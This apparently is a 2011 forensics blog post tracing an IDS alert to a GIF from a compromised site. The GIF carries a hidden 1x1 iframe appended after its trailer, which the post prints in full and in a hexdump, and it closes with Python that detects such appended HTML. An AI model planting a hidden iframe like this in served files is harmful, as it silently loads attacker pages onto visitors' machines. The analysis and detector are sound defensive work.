Saturday, June 25, 2011

Malicious iFrame in gif request

The IDS hit:
15:15:37  [1:2406560:255] ET RBN Known Russian Business Network IP TCP (281) [**] [Classification: Misc Attack] [Priority: 2] {TCP} int.ip:51352 -> 69.4.229.56:80

The httpry info:
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/wearing-jewelry.html
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/img/

From wearing-jewelry.html:

            <td align="right" nowrap="nowrap"><label for="comment[comment]">Comment</label></td>
            <td align="left"><textarea name="comment[comment]" cols="50" rows="5" id="comment[comment]" class=""></textarea></td>
          </tr>
          <tr>
            <td colspan="2" align="center" nowrap="nowrap"><table border="0" cellspacing="0" cellpadding="3">
              <tr align="center">
                <td align="right"><img src="http://magazine.gem-fashion.com/img/" border="0" /></td>
                <td align="left"><input type="button" value="Give me another word, please" class="sub" onclick="this.form.submit()" /></td>
              </tr>
            </table>
            </td>

Headers and file:
GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif

[binary GIF87a image data omitted; see the hexdump below. After the 0x3b GIF trailer the response body continues with the following appended HTML:]
<iframe src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Hexdump of gif:
         
15:48:15 ~/Forensics/$ hexdump -C index.html.gif
00000000  47 49 46 38 37 61 96 00  1e 00 a5 00 00 04 02 04  |GIF87a..........|
00000010  84 82 84 44 42 44 c4 c2  c4 24 22 24 a4 a2 a4 64  |...DBD...$"$...d|
00000020  62 64 e4 e2 e4 14 12 14  94 92 94 54 52 54 d4 d2  |bd.........TRT..|
00000030  d4 34 32 34 b4 b2 b4 74  72 74 f4 f2 f4 0c 0a 0c  |.424...trt......|
<snip>
00000420  05 37 44 10 86 0d c5 82  7c c7 a4 65 3a 14 c6 60  |.7D.....|..e:..`|
00000430  0e ab ac 85 c8 b0 bd 0b  02 05 2e 9c 2a 33 17 31  |............*3.1|
00000440  f9 1b 58 09 21 84 50 41  cc 3b 17 6d f4 d1 48 1b  |..X.!.PA.;.m..H.|
00000450  1d 04 00 3b 3c 69 66 72  61 6d 65 20 73 72 63 3d  |...;<iframe src=|
00000460  27 68 74 74 70 3a 2f 2f  61 6c 61 71 69 71 2e 6e  |'http://alaqiq.n|
00000470  65 74 2f 71 75 72 61 6e  2f 67 73 74 61 74 61 2f  |et/quran/gstata/|
00000480  69 6e 64 65 78 2e 70 68  70 27 20 77 69 64 74 68  |index.php' width|
00000490  3d 27 31 27 20 68 65 69  67 68 74 3d 27 31 27 20  |='1' height='1' |
000004a0  73 74 79 6c 65 3d 27 76  69 73 69 62 69 6c 69 74  |style='visibilit|
000004b0  79 3a 20 68 69 64 64 65  6e 3b 27 3e 3c 2f 69 66  |y: hidden;'></if|
000004c0  72 61 6d 65 3e                                    |rame>|
000004c5
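The iframe sits immediately after the GIF trailer byte 0x3b (offset 0x453 in the hexdump above), so a detector does not need to decode the image at all: walk the GIF block structure to the trailer and flag any bytes that follow it. The Python below is an added example, not from the original post; the 1x1 GIF is constructed here and only the iframe string is taken from the capture.

```python
import re
# Constructed sample (not the captured file): a minimal 1x1 GIF87a with the hidden
# iframe from the captured response appended after the 0x3B trailer.
MINIMAL_GIF = bytes.fromhex(
    "474946383761"          # "GIF87a"
    "01000100800000"        # 1x1 logical screen, global colour table flag set (2 entries)
    "000000ffffff"          # global colour table: black, white
    "2c000000000100010000"  # image descriptor: 1x1 at (0,0), no local colour table
    "0202440100"            # LZW min code size 2, one 2-byte sub-block, 0x00 terminator
    "3b"                    # GIF trailer
)
INJECTED = (b"<iframe src='http://alaqiq.net/quran/gstata/index.php' "
            b"width='1' height='1' style='visibility: hidden;'></iframe>")
SAMPLE = MINIMAL_GIF + INJECTED

def skip_sub_blocks(data, pos):   # return the offset just past the 0x00 terminator
    while pos < len(data):
        size, pos = data[pos], pos + 1
        if size == 0:
            return pos
        pos += size
    raise ValueError("truncated sub-block chain")

def gif_payload_after_trailer(data):
    """Walk the GIF block structure; return every byte after the 0x3B trailer (b'' if clean)."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    packed, pos = data[10], 13
    if packed & 0x80:                     # global colour table: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                 # trailer: a valid image ends here
            return data[pos + 1:]
        if block == 0x21:                 # extension: label byte, then sub-blocks
            pos = skip_sub_blocks(data, pos + 2)
        elif block == 0x2C:               # image descriptor, optional local colour table
            lpacked = data[pos + 9]
            pos += 10
            if lpacked & 0x80:
                pos += 3 * (2 << (lpacked & 0x07))
            pos = skip_sub_blocks(data, pos + 1)   # +1 skips the LZW min code size byte
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (block, pos))
    raise ValueError("no trailer found")

HTML_MARKER = re.compile(rb"<\s*(iframe|script|object|embed)\b", re.I)

def find_injected_html(data):
    tail = gif_payload_after_trailer(data)   # b"" for a clean image
    return (len(data) - len(tail), tail) if HTML_MARKER.search(tail) else None
```

Feeding the captured index.html.gif to find_injected_html() should report the appended tag at offset 0x454, and the same walk works on a GIF89a with extension blocks.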
